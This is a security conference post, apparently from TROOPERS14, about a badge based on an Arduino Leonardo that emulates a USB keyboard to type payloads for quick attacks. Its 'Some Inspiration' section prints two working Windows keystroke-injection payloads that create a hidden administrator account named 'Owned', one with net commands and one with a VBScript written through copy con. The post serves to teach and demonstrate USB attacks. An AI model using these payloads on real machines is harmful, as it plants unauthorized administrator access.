A TROOPER’s Keyboard

Greetings from the Print Media Academy in Heidelberg. Just in time for TROOPERS14, I’ve got the great honor to present this years badge!

 

 

Being a TROOPER is tough: You need to know loads of information, learn even more and be able to work fast.

This year we decided to increase your efficiency and speed when collecting data from computer systems and, let’s say, hacking them! Your newest gadget is based on a plain Arduino Leonardo, modded with one of our famous shields. After adding a few LEDs and buttons, it will power up to full functionality.

What does it do? – It turns blue!

Using Arduino’s HID library, some inspiration from Kautilja and stacks of own ideas, we coded some rather practical firmware. When connected to a USB slot, the badge will turn into a simple keyboard and start typing various commands onto the target system. Let me correct that, as safety goes first you will have to push a button! The badge is actually a proof of concept device, showing the potential of quick attacks via USB. As it emulates a keyboard, it can type any command into a system that you can think of, hit special keys and key combos within just a few seconds.

Proof of Concept

The badge is “payload based”, it contains a list of different scripts that can be selected using the LEDs and buttons, and then fired. We actually wrote various little payloads, some friendly, some fun, some evil aggressive. (Adding users, bricking the OS, downloading malware a just a few thoughts we had.) Due to our credo, Make the World a Safer Place, we decided to give you an impression of what could be done. This resulted in our PoC badge and some further ideas, which are published in this blog post. The badge does not contain any functions that should change anything on your system, just have closer look at the descriptions further down. Feel free to reflash the the badge and give the more dangerous payloads a try, but be cautious as it can have consequences. If you need any hints towards flashing or future use, just give me visit in the soldering corner.

The Real Thing

In default state (no LEDs or buttons), the badge will type a short string, which you will need to enter your tokens during the conference, feel free to give it a closer look. In this state, you don’t have any access to the other payloads and can’t really interface with the badge. You will have to grab some parts in the soldering corner and add them to your badge! After adding 8 resistors, 4 LEDs and (probably) two buttons, you’ll be greeted by some friendly blinking. You can now start using the badge properly.

Pressing Buttons and Watching LEDs

When you connect the Badge to your device, the left LED should be switched off and the three LEDs on the right should blink. IF the LEDs outer left and right are just switched on, visit the soldering corner! If you press the button on the left, the state of the three LEDs on the right should change to 001 (off – off – on). When pressing the buttons a few more times, you’ll see a binary counter upto 111, and then back to the blinking state. Each one of these states represents a different payload. The Button on the left is simply a status LED, showing you if the Badge is printing stuff or the serial menu is active.

1. Serial Menu
2. Leave Message and lock screen, Windows
3. Leave Message and lock screen, Mac
4. Leave Message and lock screen, Unix
5. Open Troopers Agenda, Windows
6. Open Troopers Agenda, Mac
7. Open Troopers Agenda, Linux

To authenticate towards the terminals, you can simply press the right button, while the menu LEDs are blinking!

To use the serial menu, just take your favourite flavour of serial client ant connect to the Badge! It will talk to you! And you will like it!!!

Different Payloads for Different Operating Systems?

The Badge does just the same as you would, when sitting on a computer, using Win+R, Alt+F2, the Apple button. Three OSs, three combinations for the same functionality. For this simple reason the payloads have to be adapted to each system. Above that, there are different levels of, say, exploitability. On Windows, when the users has an admin account, one does quite often not need to enter a password, when changing to admin rights by using runas, on Linux and Mac, if you use sudo, you do usually need to enter a password. This little password check messes up most payloads for both Mac and Linux.

Using the Badge as Intended

Our intention is to show you, what can be done. Your intention should be to either pass this knowledge on to others, or show us what you can do with the Badge. New scripts are easily written, further content can easily be added to the source. Just sit down and give it a try. If you’ve found a great approach feel free to show us.

Some Inspiration

  //open run
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(‘r’);
delay(100);
Keyboard.releaseAll();
delay(500);
//open cmd
Keyboard.println(F(“cmd”));//add user using net
Keyboard.println(F(“net user Owned 0wn3d /add”));
delay(500);
Keyboard.println(F(“net localgroup administrators Owned /add”));
delay(500);//close console
Keyboard.println(F(“exit”));

Now that actually was my very first payload, I wrote for our badge. It’s simple, straight forward and most surely done quicker by Badge than by hand! But, lets just imagine that we can’t use net.exe. What do we do? Find a workaround!

  //open run
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(‘r’);
delay(100);
Keyboard.releaseAll();
delay(500);//open cmd
Keyboard.println(F(“cmd”));
delay(500);//create vb script
Keyboard.println(F(“copy con %UserProfile%\adduser.vbs”));
delay(500);Keyboard.println(F(“Set objShell = CreateObject(\”Wscript.Shell\”)”));
Keyboard.println(F(“Set objEnv = objShell.Environment(\”Process\”)”));
Keyboard.println(F(“strComputer = objEnv(\”COMPUTERNAME\”)”));
Keyboard.println(F(“Set colAccounts = GetObject(\”WinNT://\” & strComputer & \”,computer\”)”));
Keyboard.println(F(“Set objUser = colAccounts.Create(\”user\”, \”Owned\”)”));
Keyboard.println(F(“objUser.SetPassword \”0wn3d\””));
Keyboard.println(F(“Const ADS_UF_DONT_EXPIRE_PASSWD = &h10000”));
Keyboard.println(F(“objPasswordExpirationFlag = ADS_UF_DONT_EXPIRE_PASSWD”));
Keyboard.println(F(“objUser.Put \”userFlags 0\”, objPasswordExpirationFlag”));
Keyboard.println(F(“objUser.SetInfo”));
Keyboard.println(F(“Set Group = GetObject(\”WinNT://\” & strComputer & \”/Administrators,group\”)”));
Keyboard.println(F(“Group.Add(objUser.ADspath)”));
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(‘z’);
delay(100);
Keyboard.releaseAll();
delay(100);
Keyboard.press(KEY_RETURN);
delay(100);
Keyboard.releaseAll();

//execute script
Keyboard.println(F(“%UserProfile%\adduser.vbs”));

//clean up
Keyboard.println(F(“delete %UserProfile%\adduser.vbs”));

//close console
Keyboard.println(F(“exit”));

Sure, it’s longer, but so what? We’ve got the space, and yet again, it just shows us some base functionality. Win + r is the easiest entry point that there is, copy con enables us to write data directly into a file, so we’ve got scripting functionality.

The Big Promise

I promised all that asked, that I’d publish an evil version of the Badge payload, I really want to, and I will try. It’s kind of my very own version of a challenge, so while you’re participating PacketWars, I’ll be playing Badge Wars! Actually Badge Wars IV, A new Ownage! If you want any further information or instructions, just ask me!

After it’s published, feel free to flash the Badge yourself, but keep in mind that we’ve got some secret bits scripted into our copy of the firmware which is already on your badge! If you wish to keep these, you should stick to our official con firmware till Friday.

The Final Thank You

At this point I just have thank Sergej Schmidt for contributing various code, ideas and support while setting up the badges. Above that many thanks to Nikhil Mittal for contributing a few really neat payloads from his Kautilya Framework. He actually heard about the Badge’s functionality, came to us and showed me some of is work for me to add!

 

Have a great evening! And see you all in the Kulturbrauerei!

Badge Wizard,
Brian